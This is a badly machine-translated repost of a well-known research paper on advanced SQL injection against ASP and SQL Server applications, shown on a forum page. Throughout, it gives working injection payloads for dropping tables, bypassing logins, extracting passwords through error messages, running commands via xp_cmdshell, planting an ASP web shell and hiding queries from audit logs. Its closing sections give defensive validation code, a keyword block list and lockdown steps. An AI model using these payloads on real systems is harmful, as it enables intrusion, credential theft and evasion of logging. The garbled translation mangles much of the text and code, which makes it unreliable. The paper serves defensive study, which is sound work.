Advanced SQL Injection in the SQL Server application
Author: Chris Anley [chris@ngssoftware.com]
An NGSsoftware Insight Security Research (NISR) Publication
Translation: Qingyan Zhiwolf (Panderlang)
Source: Wolf Online (http://www.panderlang.com/)
The first translation, the level is limited, it is inevitable, please don't finish correct. Reprinted please keep the information intact.
Summary: This document is in detail to discuss SQL injection technology, which is adapted to compare popular IIS ASP SQL Server platforms. It discusses which SQL statements can be injected into the application through a wide variety of methods, and record the data confirmation and database lock associated with the attack.
The expected readers of this document are developers of web programs that communicate with the database and those who play audit web applications.
Introduction: SQL is a structured query language for relational databases. It is divided into many species, but most of them are loosely based on the latest standard SQL-92 for the National Standardization Organization. A typical execution statement is Query, which can collect comparisonable records and return a single result set. The SQL language can modify the database structure (data definition language) and the database content (data operation language). In this document, we will specifically discuss the Transact-SQL language used by SQL Server. When an attacker can operate data written into the application by inserting a series of SQL statements into Query, we are defined as SQL injection.
A typical SQL statement is as follows: Select ID, forename, Surname from authors This statement will return the ID, forename, and weak columns of all rows in the Authors table. This result can be limited, for example: select ID, forename, Surname from authors where forename'john 'and surname =' smith 'requires focus on string' john 'and' Smith 'being limited by single quotes. Clearly, the Forename and Surname field are entered by the user, and an attacker can inject some SQL statements from the input value to this query, as follows: Forename: Jo'Hnsurname: SMITH Query statement becomes: SELECT ID, Forename Surname from authors where forename = 'smith' When the database tries to perform this query, it will return the following error: Server: MSG 170, Level 15, State 1, Line 1Line 1: IncorRect Syntax Near 'HN' The reason for this result is inserted. As a single quotation of the delimiter. The database attempts to perform 'hn', but failed. If an attacker offers special inputs such as: Forename: JO '; Drop Table Authors-Surname: The result is that the Authors table is deleted, and the reason why this result is made later.
It seems that you can solve this problem by getting a single quotation from the input or avoiding them. This is feasible, but there are several difficulties in making a solution with this method. First, not all users provide data is a string. If the user enters an AUTHOR, then our query should be like this: SELECT ID, FORENAME, Surname from authors where id = 1234 In this case, an attacker can add very simple to the end of the numbers. SQL statement, in other versions of SQL languages, use a variety of qualified symbols; in the Database Management System JET engine, the data can be limited by '#'. Second, avoid single quotes, although it can be seen, it is not necessary. For the reason, we will talk later. We further use a simple ASP login page to point out who can enter the SQLServer database and try to authenticate access to some fictional applications. This is a code submitting a single page, allowing users to enter username and password:
login page </ title> </ head></p>
<p><Body bgcolor = '000000' text = 'ccccc'> <font face = 'Tahoma' color = 'ccccc'> <center> <h1> login </ h1> <form action = 'process_loginasp' method = post> <TABLE > <Tr> <TD> UserName: </ td> <TD> <input type = text name = username size = 100 width = 100> <TD> </ TD> <TR> <TD> Password: </ td > <TD> <input type = password name = password size = 100 withd = 100> </ td> </ tr> </ table> <input type = submit value = 'submit'> <input type = reset value = ' RESET '> </ form> </ font> </ body> </ html> The following is the code of Process_login.asp, which is used to control the login: <html> <body bgcolor =' 000000 'text =' ffffff ' > <Font face = 'tahoma' color = 'ffffff'> <style> p {font-size = 20pt! Important} font {font-size = 20pt! Important} h1 {font-size = 64pt! Important} </ stople > <% @ Language = jscript%> <% Function TRACE (STR) {IF (Request.form) == "True") Response.write (STR);} Function login (cn) {var username; Var Password; username = request.form ("username"); password = request.form ("password"); var = server.createObject ("adoDb.recordset"); var sql = "select * from users where username = '" Userna ME "'and password ='" password "'"; trace ("Query:" SQL); rso.open (SQL, CN); if (rso.Eof) {r cc ();%> <Font face = 'tahoma' color = '</p>
<p>cc0000 '> <H1> <BR> <BR> <CENTER> ACCESS DENIED </ CENTER> </ H1> </ BODY> </ HTML> <% Response.end return;} else {Session ( "username") = "" rso ( "username");%> <FONT Face = 'tahoma' color = '00cc00'> <H1> <CENTER> ACCESS GRANTED <BR> <BR> Welcome, <% Response.write (rso ( " "); Response.write (" </ body> </ html> "); response.end}} function main () {// set up connections var usernamevar cn = server.createObject (" adodb.connection ") Cn.connectionTIMEOUT = 20; CN.Open ("Localserver", "SA", "password"); username = new string (Request.form ("UserName")); if (username.length> 0) {login CN);} cn.close ();} main ();%> There is a problem with problems in Process_lgin.asp: Var SQL = "SELECT * from users where username = '" username "' AND Password = '" password " "; if the information entered by the user is as follows: username:'; Drop Table Users-Password: Database Database Table Users will be deleted, reject any user to enter the application. '-' symbols in Transact-SQL indicate ignoring '-' future statements, ';' symbol represents the end of a query and the beginning of another query. '-' is a must be in the username field, which is to terminate this special query and do not return an error. The attacker can only provide the username they know, you can log in with any user, use the following: username: admin'-attacker can use the first user in the UserS table, enter the following: username: 'or 1 = 1 - More specifically, an attacker can log in with a completely fiction, enter the following: username: 'Union Select 1,' fictional_user ',' some_password ', 1 - This reason is that the application believes that the attacker specifies from A part of the result is returned in the database.</p>
<p>Getting information by error message This is almost discovered by David Litchfield, and is tested by the author infiltration; later David wrote a document, and later the author refers to this document. These explanations discussed the 'error message' potential mechanism to enable the reader to fully understand it, potentially triggering their ability. In order to operate data in the database, the attacker must determine some databases and some tables of structures. For example, we can create a USER table using the following statement: Create Talbe Uses (ID INT, Username VARCHAR (255), Password Varchar (255), PASS INT) then insert the following users in the UserS table: Insert Into Users Values (0, 'admin', 'R00TR0X!', 0xfff) Insert INTO Users Values (0, 'Guest', 'Guest', 0x0000) Insert INTO Users Values (0, 'Chris', 'Password', 0x00FF) Insert Into Users VALUES 0, 'Fred', 'SESAME', 0x00FF) If our attacker wants to insert a self. He can't succeed if you don't know the USERS table structure. Even if he is more fortunate, it is not clear to the PRIVS field. An attacker may insert a '1', which gives him a low authority user. Fortunately, if an error message is returned from the application (default as an ASP behavior), the attacker can determine the structure of the entire database and can connect to the permissions of SQLServer in the program. (Below below with a simple database and ASP script, how do they work) First, the attacker wants to get the name and field of the establishment of the user's table, to do this, the attacker needs to use the SELECT syntax haVing clause : Username: 'Having 1 = 1 - This will appear as follows: Microsoft Ole DB Provider for ODBC Drivers Error' 80040E14 '[Microsoft] [ODBC SQL Server Driver] [SQL Server] Column' Users.id 'Is Invalid in The SELECT LIST BECAUSE IS NOT Conta In Aggregate Function and the no group by clause. /process_login.asp, line 35 So now the attacker knows the name of the table and the name of the first location.</p>
<p>They can still put the fields to the group by clause, only I can find a field name, as follows: username: 'group by users.id Having 1 = 1 - The error occurred as follows: Microsoft OLE DB Provider for ODBC Drivers Error '80040e14' [Microsoft] [ODBC SQL Server Driver] [SQL Server] Column 'users.username' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. /process_login.asp, line 35 The final attacker gets the UserName field: 'group by users.id, users.username, users.password, users.privs haVing 1 = 1 - This sentence does not generate errors, equivalent to: Select * from users where username = '' Therefore, an attacker now knows that the query involves the UserS table, using column 'ID, username, password, privs' in order. It is very useful to determine the type of each column. This can be implemented by using type conversion, for example: username: 'union select sum (username) from users - This uses SQLServer to determine if the fields of the two result sets are equal to the SUM clause. Try to calculate the sum will get the following message: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft] [ODBC SQL Server Driver] [SQL Server] The sum or average aggregate operation can not take a varchar data type as an argument /. Process_login.asp, line 35 This tells our 'username' field type to varchar. If it is another case, we try to calculate SUM () is a digital type, and we get the error message tells us that the number of fields of the two collections is not equal. Username: 'Union Select SUM (ID) from users-Microsoft Ole DB Provider for ODBC Drivers Error' 80040E14 '</p>
<p>[Microsoft] [ODBC SQL Server Driver] [SQL Server] All queries in an SQL Statement Containing a Union Operator Must Have An Equal Number of Expressions In Their Target Lists./process_login.asp, Line 35 We can use this technology approximately Determine the type of any fields in any table in the database. Such an attacker can write a good INSERT query, for example: username: '; Insert Into Users Values (666,' Attacker ',' Foobar ',' 0xFFFF) - The potential impact of this technology is not just these. An attacker can use these error messages to display environmental information or databases. The standard error message can be obtained by running a list of strings in a certain format: select * from master ..sysments explains these will implement interesting messages. A particularly useful message is related to type transformation. If you try to convert a string into an integer number, all contents of the string will return to the error message. For example, in our simple landing page, you will display the version of SQLServer and the running operating system information after username: username: 'union select @@ version, 1,1,1-Microsoft Ole DB Provider for ODBC Drivers Error' 80040E07 '</p>
<p>[Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 2) 'to a column of data type int./process_login.asp, line 35 This tries to turn the built-in' @@ version 'constant into a integer number, because The first column in the UserS table is an integer number.</p>
<p>This technique can be used to read any of the values of any table in the database. Since the attacker is more interested in the username and user password, they prefer to read the username from the userS table, for example: username: 'union select min (username), 1, 1 from users where username>' A '- This sentence selects the minimum value of the username in the usern table, and try to convert it into a integer number: Microsoft Ole DB Provider for ODBC Drivers Error' 80040E07 '</p>
<p>[Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntax Error Converting The VARCHAR VALUE 'Admin' to a Column of Data Type Int./process_login.asp, line 35 Therefore, an attacker already knows that user admin is exist. This way he can repeat the next user by using the WHERE clause and the user name. Username: 'union select min (username), 1,1,1 from users where username>' admin'-Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntax error Converting the varcharue 'chris' to a column of data type int./process_login.asp, Line 35 Once the attacker determines the username, he can start collecting password: username:' Union Select Password, 1, 1, 1 from Users where username = 'admin'-Microsoft Ole DB Provider for ODBC Drivers Error' 80040E07 '</p>
<p>[Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntax Error Converting The VARCHAR VALUE 'R00TR0X!' TO A Column of Data Type Int./process_login.asp, line 35</p>
<p>A more advanced technology is to connect all usernames and passwords to a separate string and try to convert it into integer numbers. This example stated that the Transavt-SQL syntax can connect them without changing the same line. The following scripts will connect to the value: begin declare @ret var line (8000) set @ret = ':' SELECT @ Ret = @ Ret '' username '/' password from users whereusername> @retselect @ret as reet INTO Fooend attacker uses this as a username login (all in one line) Username: '; begin declare @ret varchar (8000) set @ Ret =': 'select @ Ret = @ RET ' ' UserName ' / ' Password from FROM Users where username> @ret select @ret as return @Ret select @ret as return @Ret Select @ret As Ret Into foo end - This creates a Foo table with only one separate column 'RET', which stores the string of the username and password we get. Under normal circumstances, a low authority can create a table in the same database or create a temporary database. Then the attacker can get the string we have to get: Username: 'Union Select RET, 1, 1, 1 from foo-microsoft ole db provider for odbc drivers error' 80040E07 '[Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntax Error Converting The VARCHAR VALUE ': Admin / R00TR0X! Guest / Guest Chris / Password Fred / SESAME' TO A Column of Data Type Int./process_login.asp, Line 35 Then Discard (Delete) Table Clear Footprints: Username : '; DROP TABLE FOO - This example is just a surface of this technology. It is not necessary to say that if an attacker can get enough mistakes from the database, their work will become unlimited.</p>
<p>Get higher privileges once the attacker controls the database, they want to use that permissions to get higher control over the network. This can be achieved by many ways: 1. On the database server, use the XP_cmdshell extension stored procedure execution command with SQL Server permissions. 2. Use the XP_REGREAD extended stored procedure to read the key value of the registry, of course, including the SAM key (provided SQL Server is run by system authority) 3. Use other stored procedures to change the server 4. Execute Query 5 on the connected server. Creating a customer extension stored procedure to perform overflow code in the SQLServer process 6. Use the 'Bulk Insert' syntax to read any file on the server 7. Use BCP to create files on any text format on the server 8. Using sp_oacreate, sp_oamethod and sp_oAgetProperty The system stored procedure creates an ActiveX application so that it can do anything that ASP scripts can do.</p>
<p>These only list a small amount of very ordinary possible attack methods, and attackers are likely to use other methods. We introduce the collection of attacks on the obvious attack method of the SQL server, in order to explain which aspect may be, and the permissions are permissions to inject SQL .. We will process the various methods mentioned above: [xp_cmdshell] Many stored procedures are created in SQL Server, perform a wide variety of features, such as sending emails and interact with registry. XP_cmdshell is a built-in stored procedure that allows an arbitrary command line command. For example: Exec master..xp_cmdshell 'Dir' will get a list of directory in the current working directory of the SQL Server process. Exec master..xp_cmdshell 'Net User' will provide a list of all users on the server. When SQL Server is running in a system account or domain account, an attacker can make a more serious harm.</p>
<p>[XP_REGREAD] Another useful built-in stored procedure is a function set of XP_REGXXXX classes. XP_regaddmultiTRINGXP_REGDELETEKEYXP_REGDELETEVALUEXP_REGENUMKEYSXP_REGENUMVALUESXP_REGREADXP_REGREMOVEMULTINTISTRINGXP_REGWRITE</p>
<p>The method of use of these functions is as follows: EXEC XP_REGREAD HKEY_LOCAL_MACHINE, 'System / CurrentControlSet / Services / LanmanServer / Parameters', 'NullSsShares' This will determine what session connection is available on the server.</p>
<p>EXEC XP_REGENUMVALUES HKEY_LOCAL_MACHINE, 'System / CurrentControlSet / Services / SNMP / Parameters / ValidCommunities' This will display all SNMP community configuration on the server. In the case where the SNMP group is rarely changed and shared between many hosts, this information, the attacker may reconfigure the network device in the same network.</p>
<p>This is easy to imagine an attacker to read SAM using these functions, modify the configuration of the system service, start it when the machine is restarted, or executes an arbitrary command when you log in next time.</p>
<p>[Other stored procedures] XP_ServiceControl procedure allows users to start, stop, suspend, and continuing services: exec master ", 'Schedule'Exec master..xp_serviceControl' start ',' Server 'lists a small amount other useful stored procedure: xp_availablemedia exhibit useful drive machine Xp_dirtree allow to obtain a tree Xp_enumdsn include ODBC data source xp_loginconfig Reveals information on the server about the security mode of the serverXp_makecab allows users to create on the server a compressed file Xp_ntsec_enumdomains include server Enter the domain XP_TERMINATE_PROCESS provides the process ID of the process, terminating this process</p>
<p>[Linked Servers] SQL Server provides a mechanism that allows the server connection, that is, allowing queries on a database server to operate data on another server. This link is stored in the master.sysservers table. If a connected server has been set to use the 'sp_addlinkedsrvlogin' process, the currently trusted connection can be accessed to the server without logging in. The 'OpenQuery' function allows query out of the server. [Custom Extended Stored Procedures] Extended stored procedure application interface is quite simple, create a malicious code extended stored procedure Dynamic Library is a fairly simple task. There are several ways to use the command line to upload dynamic connection libraries to the SQL server, and other communication mechanisms including multiple automatic communication, such as HTTP download and FTP scripts. Once the dynamic connection library file runs on the machine, the SQL server can be accessed - this does not need it to be a SQL server - an attacker can add an extended stored procedure using the following command (in this case, our malicious stored procedure It is a small Trojan that outputs a system file of the server):</p>
<p>SP_ADDEXTENDEDPROC 'XP_WEBSERVER', 'C: /TEMP/XP_FOO.DLL' In normal mode, this extended stored procedure can be running: Exec XP_WebServer Once this program is run, you can use the following method to remove it: XP_dropextendedProc 'XP_WEBSERVER'</p>
<p>[Import text file import table] Use the 'Bulk INSERT' syntax to insert a text file into a temporary table. Simply create this table: CREATE TABLE FOO (Line VARCHAR (8000)) Then perform BULK INSERT to insert the data in the file into the table, such as: bulk insert foo from 'c: /inetpub/wwroot/process_login.asp'</p>
<p>The above-described error message technology can be used, or using the 'union', the data in the text file is combined with the data returned by the application, and the data is retrieved. This is very useful for the script source code or ASP script code stored on the database server or the ASP script code.</p>
<p>[Establishing text files using BCP] You can easily establish any text file using 'BULK INSERT'. Unfortunately, this requires command line tools. 'bcp', that is, 'Bulk Copy Program' Since BCP can access the database from the SQL service process, it needs to be logged in. This means is not very difficult, and since the attacker can build, or use the overall security mechanism (if the server is configured to use it).</p>
<p>The command line format is as follows: BCP "Select * from text..foo" Queryout C: /inetpub/wwwroot/runcommand.asp -c -slocalhost -usa -pfoobar's' parameter is the server that executes queries, 'u' parameters are user names, 'P' parameter is a password, here is 'FOOBAR'</p>
<p>[ActiveX Automation Scripts in SQL Server] SQL Server provides several built-in storage procedures for creating ActiveX automatic execution scripts. These scripts and scripts running under the Windows script interpreter, or the ASP script - they use VBScript or JavaScript, and they create automatic execution objects and interact with them. An automatic execution script uses this method to write anything that can be done in the ASP script in Transact-SQL, or anything you can do in the WSH script. In order to clarify this shoe, there are several examples: (1) This example creates a notepad using 'wscript.shell' object: wscript.shell exampleDeclare @o intexec sp_oacreate 'wscript.shell', @ o Outexec sp_oAmethod @ o, 'Run', NULL, 'NOTEPAD.EXE' We can perform it by specifying it behind: username: '; declare @o int exec sp_oacreate' wscript.shell ', @ o out exec sp_oamethod @o, 'Run', NULL, 'NOTEPAD.EXE'-</p>
<p>(2) This example reads a known text file using 'scripting.filesystemObject': - scripting.filesystemObject Example - Read a known filedeclare @o int, @f int, @t int, @ret INTDECLARE @Line Varchar 8000) exec sp_oacreate 'scripting.filesystemobject', @o outexec sp_oamethod @o, 'opentextfile', @f out, 'c: /boot.ini', 1exec @ ret = sp_oamethod @ f, 'readline', @ line outwhile ( @ Ret = 0) Beginprint @lineexec @ RET = SP_OAMETHOD @ f, 'readline', @ line Outend</p>
<p>(3) This example creates a command that can perform by submitted: - scripting.FileSystemObject Example - Create A 'Run this'.ASP fileDeclare @o int, @ f int, @ T Int, @ RET INTEXEC SP_OACREATE' Scripting.filesystemObject ', @ o Outexec sp_oamethod @ o,' createtextfile ', @ f out,' c: /inetpub/wwroot/foo.asp' ,1exec @ Ret = sp_oamethod @ f, 'writeline', NULL, '<% Set o = server.createObject ("wscript.shell"): o.Run ("cmd"))%> 'needs to point out if the running environment is on the WIN NT4 IIS4 platform, then this program The running command is run by system authority. In IIS5, it runs with a relatively low permission IWAM_XXXACCOUNT. (4) These examples describe the application of this technology; it can use 'speech.voicetext' objects to cause SQL Server vocal: Declare @o int, @ RET INTEXEC sp_oacreate 'speech.voicetext', @ o Outexec sp_oamethod @o, ' Register ', null,' foo ',' bar'Exec sp_oasetproperty @ o, 'speted', 150exec sp_oamethod @ O, 'Speak', Null, 'All Your Sequel Servers Are Belong To, US', 528WAITFOR DELAY '00: 00 : 05 'We can perform it in our assumed example (note that this example is not only injecting a script, but also logging in to the application at admin privileges): username: admin'; Declare @o int, @ ret int exec sp_oacreate 'speech.voicetext', @ o out exec sp_oamethod @ o, 'register', NULL, 'foo', 'bar' exec sp_oasetproperty @ o, 'speed', 150 exec sp_oamethod @o, ' Speak ', NULL,' All Your Sequel Servers Are Belong To US, 528 Waitfor Delay '00: 00: 05' -</p>
<p>[Stored Procedure] Legend If an ASP application uses a stored procedure in the database, then SQL injection is impossible. This sentence is only half of it, it depends on how to call this stored procedure in the ASP script. Essentially, if an parameter query is executed, and the parameters provided by the user are put into the query by security check, then SQL injection is obviously impossible. But if an attacker strives to affect the non-data part of the query statement, they may be able to control the database. A preferred conventional standard is:? If an ASP script can generate a submitted SQL query string, even if it uses the stored procedure, it is also possible to cause SQL injection weaknesses. • If an ASP script uses a process object restricted parameter to allocate (such as the Command object for the ADO for parameters), then through this object, it is generally secure. Obviously, since the new attack technology is always found, a good convention is still verifying all the inputs. In order to clarify the query injection of the stored procedure, the following statement is performed: sp_who '1' select * from sysObjectsorsp_who '1'; select * from sysobjects Any method, after the stored procedure, the additional query will still be executed.</p>
<p>[Advanced SQL Injection] Normally, a web application will filter a single quotation number (or other symbol), or limit the length of the data submitted by the user. In this section, we discuss some techniques that can help attackers to make it clearly to prevent SQL injection, avoiding recorded.</p>
<p>[String of single quotes] Sometimes developers protect the application by filtering all single quotes, they might use the Replace function in VBScript: Function Escape (Input) Input = Replace (Input, "'", "'') escape = INPUTEND FUNCTION Optionally, this prevents all of our examples from attacking, then remove ';' symbols can also help. But in a large application, it seems that the individual values expect users to enter numbers. These values are not limited, so the attacker provides an weak point of SQL injection. If an attacker wants to generate a string value without using a single quotation, he can use a char function, for example: Insert Into Users Values (666, Char (0x63) Char (0x68) CHAR (0x72) CHAR90X69) Char (0x73 ), char (0x63) char (0x68) char (0x72) char90x69) char (0x73), 0xfff) This is a query that can be inserted into a string inserted into a string. Land, if an attacker does not mind using a digital user name and password, the following statement will also work: Insert INTO Users Values (667, 123, 123, oxfff) SQL Server automatically converts integration into a VARCHAR type value.</p>
<p>[Second-Order SQL INJECTION] Even if the application is always filtering single quotes, an attacker still injects SQL and also reuses the data in the database through the application. For example, an attacker may use the following information to register in the application: username: admin'-password: password application correctly filtered the single quotes, returned a INSERT statement similar to this: INSERT INTO USERS VALUES (123, 'Admin' '-', 'Password', 0xfff) We assume that the application allows the user to modify its own password. This ASP script first guarantees the user to set the correct old password before setting the new password. The code is as follows: username = escape (Request.form ("UserName")); OldPassword = escape (Request.form ("Oldpassword")); newpassword = escape (Request.form ("NewPassword"); var = server. CreateObject ("AdoDb.Recordset"); var sql = "select * from users where username = '" username "' and password = '" Oldpassword "'"; rso.open (SQL, CN); IF {... Set the code for the new password as follows: SQL = "Update users set password = '" newpassword "' where username = '" RSO ("Username") "'" RSO ("UserName") When the user returned in the login query is used as admin'-, the query statement is: update users set password = 'password' where username = 'admin'- "This attacker can be based on the user who is registered with an admin'- Your own idea to set the password of admin. This is a very serious problem, currently trying to filter data in large applications. The best solution is to refuse illegal inputs, which is better to try to modify it. This sometimes causes a problem, illegal characters there are necessary, for example, in the username contains' symbols, such as O'Brien from a security point of view, the best solution is that the quotation marks are not allowed to exist is a simple fact. If this is unacceptable, they still have to be filtered; in this case, all data that enters the SQL query is the best way. If an attacker does not use any app inexplicably inserted into the system, the attack is also possible. The application may have an email interface, or may store the error log in the database so that an attacker can work hard to control it. Verify all data, including the data already existing in the database is always a good method.</p>
<p>The confirmation function will be simply called, for example: if isvalid ("email", request.QueryString ("email")) TheResponse.end or a similar method. [Length Restriction] In order to give attackers more difficult, sometimes the length of input data is limited. When this hinders attacks, a small SQL can cause very serious harm. For example: username: '; shutdown - This will stop the SQL Server instance using only 12 input characters. Another example is: DROP TABLE <TABLENAME> If the limit length is after the filter string will cause another problem. Assume that the user name is limited to 16 characters, the password is also limited to 16 characters, then the following user name and password will be executed in conjunction with the aforementioned shutdown command: Username: aaaaaaaaaaaaaaa'Password: '; shutdown- because the application attempts to Filter the last single quotes of the username, but the string is cut into 16 characters and remove a single quotes after filtering. Such a result is that if the password field begins with single quotation, it can contain some SQL statements. Since the query looks: select * from users where username = 'aaaaaaaaaaaaa' 'and password =' '; shutdown- actually, the username in the query has changed to: AAAAAAAAAAAAAA' and password = 'SQL statement Will be executed.</p>
<p>[Audit] SQL Server includes a wide audit interface that allows various events in the database, which is included in the SP_Tracexxx class. It is especially interesting that all SQL statements can be recorded, then the T-SQL events executed on the server. If this audit is activated, all injected SQL queries we discussed will be recorded in the database, and a skilled database administrator will know what happened. Unfortunately, if an attacker adds a string: sp_password to a Transact-SQL statement, this audit mechanism record the log as follows: - 'sp_password' was found in the text of this event .-- The text has been replaced with this TH Comment for security reasons. This behavior occurs in all T-SQL diary records, even if 'sp_password' occurs in one comment. This process intends to hide the user's password through sp_password, but this is a very useful method for an attacker. Therefore, in order to hide all injections, the attacker needs to simply add sp_password after the '-' annotation characters, for example: username: admin'-sp_password, in fact, some SQL executed will be recorded, but the query itself will smoothly smoothly disappear.</p>
<p>[Prevent] This section discusses some of the prevention of the attack on the description. We will discuss input confirmation and provide some simple code, and then we will engage in SQL Server lock.</p>
<p>[Enter verification] Enter verification is a complex topic. More representative is that since it is too closely confirmed that the temporary temporarity temporarily caused, the input confirmation is difficult to resolve, and there are few attention to the project development to confirm. The input confirmation is not a function of inclined it to the application's function, so it is generally ignored. Below is an outline of discussion input confirmation with simple code. This simple code cannot be used directly in the application, but it clearly clarifies different strategies. Different data confirmation methods can be classified by: 1) Efforts to modify data to make it correct 2) Refuse to be input 3) Only receiving a conceptual problem that is considered to be correct. First, developers don't have to know that those are wrong data, because the form of new error data is always found. Second, modifying the data will cause the length problem of the data described above. Finally, the problem of secondary use includes reuse that already exists in the system. The second case also has problems in the first case; known error inputs with the development of attack technologies. The third case may be the best in three, but it is difficult to implement. From a security perspective, the second method and the third method may be the best way - only the correct input, then search for the error data known in the input. Problems with Names with Connection Symbols For the need to merge the two methods: quentin Bassington-Bassington We must allow connection symbols in the correct input, but we also realize character sequence '-' to SQL Server Very important. Another problem occurs when merging and modifying data and character sequence confirmation. For example, if we apply an error filtering to detect '-', 'select' and 'union' after removing single quotes, the attacker can enter: uni'on sel'ect @@ version -'- Since single quotes are removed, An attacker can simply spread the single quota to avoid discovery in its own wrong string. This has some examples of confirmation code: Method 1 - Filter single quotes Function Escape (Input) INPUT = Replace (INPUT, "'", "') escape = INPUTEND FUNCTION Method 2 - Reject known error Infunction Validate_string (INPUT) KNOWN_BAD = Array ("SELECT", "INSERT", "Update", "delete", "DROP", "-", "') validate_string = truefor i = lbound (known_bad) to Ubound (known_bad) IF (INSTR (1, INPUT, KNOWN_BAD (I), VbtextCompare) <> 0) ThenValidate_String = falseexit functionend ifnextend function</p>
<p>Method three - only the correct input function validatepassword (input) good_password_chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" validatepassword = truefor i = 1 to len (input) c = mid (input, I, 1) if (InStr (good_password_chars, c) = 0 ) ThenvalidatePassword = falseExit FunctionEND IFNEXTEND FUNCTION [SQL Server Lock] In this important point is that it is necessary to lock SQL Server; it is unsafe. This is a short list of things that you need to do when you create SQL Server: 1. Determine how to connect the server a. Make sure the network library you use is available, then use "NetWork Utility" 2. OK which account is existed A. Create a low permissions of accounts b. Delete unnecessary account c. Determine all accounts have strong password; execute password audit 3. Determine which objects exist a. Many extended stored procedures can be safely Remove. If this is done, you should remove the '.dll' file b in the extended stored procedure code. Remove all sample databases - such as 'Northwind' and 'Pubs' Database 4. Make sure which objects can be used to use a. The account used by the application enters the database should be guaranteed to use the minimum permissions of the object it needs to be used. 5. Determine the server's patch a. For SQL Server has some buffer overflow and formatted string attack, there are other security Patch release. There should be a lot. 6. OK should be recorded by logs, what should be ended in the log.</p>
<p>[References] [1] Web Application Disassembly with ODBC Error Messages, David Litchfieldhttp: //www.nextgenss.com/papers/webappdis.doc [2] SQL Server Security Checklisthttp: //www.sqlsecurity.com/checklist.asp [3] SQL Server 2000 Extended Stored Procedure Vulnerabilityhttp: //www.atstake.com/research/adv...0/a120100-2.txt [4] Microsoft SQL Server Extended Stored Procedure Vulnerabilityhttp: //www.atstake.com / BUFFER FORMAT SQL ServerHttp://www.microsoft.com/technet/sen...in/ms01-060.asp http: / / www.atstake.com/research/adv...txt</p></div><div class="text-center mt-3 text-grey">
转载请注明原文地址:https://www.9cbs.com/read-86008.html</div><div class="plugin d-flex justify-content-center mt-3"></div><hr><div class="row"><div class="col-lg-12 text-muted mt-2"><i class="icon-tags mr-2"></i><span class="badge border border-secondary mr-2"><h2 class="h6 mb-0 small"><a class="text-secondary" href="tag-2.html">9cbs</a></h2></span></div></div></div></div><div class="card card-postlist border-white shadow"><div class="card-body"><div class="card-title"><div class="d-flex justify-content-between"><div><b>New Post</b>(<span class="posts">0</span>)
</div><div></div></div></div><ul class="postlist list-unstyled">
</ul></div></div><div class="d-none threadlist"><input type="checkbox" name="modtid" value="86008" checked /></div></div></div></div></div><footer class="text-muted small bg-dark py-4 mt-3" id="footer"><div class="container"><div class="row"><div class="col">CopyRight © 2020 All Rights Reserved
</div><div class="col text-right">Processed:
<b>0.059</b>, SQL:
<b>9</b></div></div></div></footer><script src="./lang/en-us/lang.js?2.2.0"></script><script src="view/js/jquery.min.js?2.2.0"></script><script src="view/js/popper.min.js?2.2.0"></script><script src="view/js/bootstrap.min.js?2.2.0"></script><script src="view/js/xiuno.js?2.2.0"></script><script src="view/js/bootstrap-plugin.js?2.2.0"></script><script src="view/js/async.min.js?2.2.0"></script><script src="view/js/form.js?2.2.0"></script><script>
var debug = DEBUG = 0;
var url_rewrite_on = 1;
var url_path = './';
var forumarr = {"1":"Tech"};
var fid = 1;
var uid = 0;
var gid = 0;
xn.options.water_image_url = 'view/img/water-small.png';
</script><script src="view/js/wellcms.js?2.2.0"></script><a class="scroll-to-top rounded" href="javascript:void(0);"><i class="icon-angle-up"></i></a><a class="scroll-to-bottom rounded" href="javascript:void(0);" style="display: inline;"><i class="icon-angle-down"></i></a></body></html><script>
var forum_url = 'list-1.html';
var safe_token = 'rMIT_2BE0wJ6JOLtFdV5hsC5ycNh9K_2F5ypMncDIcosN62QCEknQKYBx7AVRTHRXveeJJhO4xCvHyvfApVmSeucgg_3D_3D';
var body = $('body');
body.on('submit', '#form', function() {
var jthis = $(this);
var jsubmit = jthis.find('#submit');
jthis.reset();
jsubmit.button('loading');
var postdata = jthis.serializeObject();
$.xpost(jthis.attr('action'), postdata, function(code, message) {
if(code == 0) {
location.reload();
} else {
$.alert(message);
jsubmit.button('reset');
}
});
return false;
});
function resize_image() {
var jmessagelist = $('div.message');
var first_width = jmessagelist.width();
jmessagelist.each(function() {
var jdiv = $(this);
var maxwidth = jdiv.attr('isfirst') ? first_width : jdiv.width();
var jmessage_width = Math.min(jdiv.width(), maxwidth);
jdiv.find('img, embed, iframe, video').each(function() {
var jimg = $(this);
var img_width = this.org_width;
var img_height = this.org_height;
if(!img_width) {
var img_width = jimg.attr('width');
var img_height = jimg.attr('height');
this.org_width = img_width;
this.org_height = img_height;
}
if(img_width > jmessage_width) {
if(this.tagName == 'IMG') {
jimg.width(jmessage_width);
jimg.css('height', 'auto');
jimg.css('cursor', 'pointer');
jimg.on('click', function() {
});
} else {
jimg.width(jmessage_width);
var height = (img_height / img_width) * jimg.width();
jimg.height(height);
}
}
});
});
}
function resize_table() {
$('div.message').each(function() {
var jdiv = $(this);
jdiv.find('table').addClass('table').wrap('<div class="table-responsive"></div>');
});
}
$(function() {
resize_image();
resize_table();
$(window).on('resize', resize_image);
});
var jmessage = $('#message');
jmessage.on('focus', function() {if(jmessage.t) { clearTimeout(jmessage.t); jmessage.t = null; } jmessage.css('height', '6rem'); });
jmessage.on('blur', function() {jmessage.t = setTimeout(function() { jmessage.css('height', '2.5rem');}, 1000); });
$('#nav li[data-active="fid-1"]').addClass('active');
</script>
